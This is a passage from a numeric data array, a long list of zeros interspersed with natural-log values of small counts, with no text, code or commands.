0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 5.635093354472376, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, \n 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.6931471805599453, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 5.1298987149230735, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 1.0986122886681098, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 6.127701357652087, 0.0, 0, 0, 0, 0, 0, 0, 0.0, 0, 0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, \n 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 7.917171988845775, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.6094379124341003, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 5.723585101952381, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 7.408770583887592, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 4.828313737302301, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.6931471805599453, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 4.605170185988092, 0.0, 0, \n 0, 0, 0, 0, 0, 0, 1.6094379124341003, 1.0986122886681098, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 4.518263445217987, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, \n 1.3862943611198906, 1.0986122886681098, 4.624972813284271, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.567740402508133, 0.0, 0.0,\n 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.101797476893978, 0.0, 0.0, 0.0, \n 1.3862943611198906, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 1.0986122886681098, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 